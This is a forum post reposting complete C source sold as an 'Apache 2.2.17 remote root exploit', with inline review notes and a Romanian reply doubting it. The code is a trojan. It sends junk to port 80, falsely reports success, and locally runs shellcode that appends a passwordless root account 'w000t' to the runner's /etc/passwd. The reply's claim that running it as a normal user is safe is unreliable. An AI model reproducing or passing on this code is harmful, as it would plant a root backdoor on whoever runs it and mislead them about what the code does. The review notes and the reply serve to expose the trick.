Nytro

Apache 2.2.17 remote root exploit


Apache 2.2.17 remote root exploit

/* apachesm4sh.c apache 2.2.17 remote root exploit*/
/* KEEP PRIV8&!&! leak and i will find you :) ~ desg */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/*
 * Payload blob: a run of non-ASCII bytes followed by readable ASCII.
 * The ASCII tail decodes to
 *   /bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD
 * which is the text of a passwd entry named "w000t" with an empty password
 * field and uid/gid 0, plus a redirect that appends to /etc/passwd.
 * NOTE(review): the leading bytes (ending in \xcd\x80 then \xe8\xd1\xff\xff\xff)
 * look like a 32-bit x86 Linux stub; they are not disassembled here, so
 * treat that reading as unverified.
 * main() uses this array twice: it is copied into the buffer that is sent
 * over the socket, and it is passed as the command string to a local shell.
 */
char evil[] =
"\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
"\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
"\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
"\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
"\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
"\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
"\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
"\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
"\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
"\x44\x44";

/*
 * Only BSIZE and ASIZE are referenced by main() in the listing shown.
 * NOP, OFFSET and ADDR are defined but never used: no padding is written
 * and no address is placed into the buffer.
 */
#define NOP 0x90
#define BSIZE 1000
#define OFFSET 400
#define ADDR 0xbffff658
#define ASIZE 2000

/*
 * Entry point. Expects exactly one argument (a host name), connects to TCP
 * port 80 on it, sends a partly uninitialised buffer, then forks a child
 * that passes the evil array to /bin/sh on the machine running this binary.
 * NOTE(review): nothing in this function builds an HTTP request, and the
 * only action with a defined effect is the local execl(); this is consistent
 * with the forum reply's reading that the program targets whoever runs it
 * rather than the named host.
 */
int
main(int argc, char *argv[])
{
char *buffer;
int s;
struct hostent *hp;
struct sockaddr_in sin;
if (argc != 2) {
printf("%s <target>\n", argv[0]);
exit(1);
}
/* malloc() does not initialise the block; only the three writes below touch it. */
buffer = (char *) malloc(BSIZE + ASIZE + 100);
if (buffer == NULL) {
printf("Not enough memory\n");
exit(1);
}
/*
 * Copies evil so that it ends at index BSIZE. Bytes before the copy and the
 * ASIZE bytes after it are never written, so their content is indeterminate.
 */
memcpy(&buffer[BSIZE - strlen(evil)], evil,
strlen(evil));
/* A ';' and a terminator are stored after the unwritten ASIZE region. */
buffer[BSIZE + ASIZE] = ';';
buffer[BSIZE + ASIZE + 1] = '\0';
/* Resolve the single command-line argument as a host name. */
hp = gethostbyname(argv[1]);
if (hp == NULL) {
printf("no such server\n");
exit(1);
}
bzero(&sin, sizeof(sin));
bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
sin.sin_family = AF_INET;
/* Destination port is fixed at 80. */
sin.sin_port = htons(80);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
printf("Can't open socket\n");
exit(1);
}
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
printf("Connection refused\n");
exit(1);
}
printf("sending exploit code...\n");
/*
 * strlen(buffer) scans from index 0 through uninitialised memory, so the
 * length sent depends on whatever the heap happened to hold.
 * The != 1 test prints the success message for every send() result except
 * exactly 1, including -1 on error; neither message is derived from any
 * response from the remote host (nothing is ever read from s).
 */
if (send(s, buffer, strlen(buffer), 0) != 1)
printf("exploit was successful!\n");
else
printf("sorry, this site isn't vulnerable\n");
printf("waiting for shell.....\n");
/*
 * Local side effect: the child hands the whole evil array to /bin/sh as a
 * -c command string on this machine. The socket s is not involved.
 * NOTE(review): how the shell treats the leading non-text bytes is not
 * established from this listing; the readable tail contains
 * ">> /etc/passwd", so the privileges of the invoking user determine
 * what the child can modify.
 * NOTE(review): wait() is called without <sys/wait.h> among the includes.
 */
if (fork() == 0)
execl("/bin/sh", "sh", "-c", evil, 0);
else
wait(NULL);
/* Busy loop: no data is relayed to or from s, so no session is presented. */
while (1) { /* shell */ }
}

Sau: [C] /* apachesm4sh.c apache 2.2.17 remote root exploit*/ /* KEEP PRIV8&!&! leak and - Pastebin.com

Discutie aici, e posibil sa nu fie exploit: Full Disclosure: Apache 2.2.17 exploit?


Acel "evil" hex se termina cu:

"/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd#AAAABBBBCCCCDDDD"

Trimite datele unde ziceti voi:

send(s, buffer, strlen(buffer), 0)

Asta e executat local...

execl("/bin/sh", "sh", "-c", evil, 0);

Deci cred ca e fake, backdoor, deci nu executati (cel putin NU ca root). Sau scoateti:

if (fork() == 0)
execl("/bin/sh", "sh", "-c", evil, 0);
else
wait(NULL);

Desi acesta e posibil sa fie necesar pentru shell. Nu stiu ce fac primele instructiuni, daca am timp si reusesc sa dezasamblez datele din hex, poate imi dau seama daca infecteaza sau nu.

Deocamdata nu sunt sigur daca e backdoor sau nu, rulati ca user normal si nu ar trebui sa fie probleme.

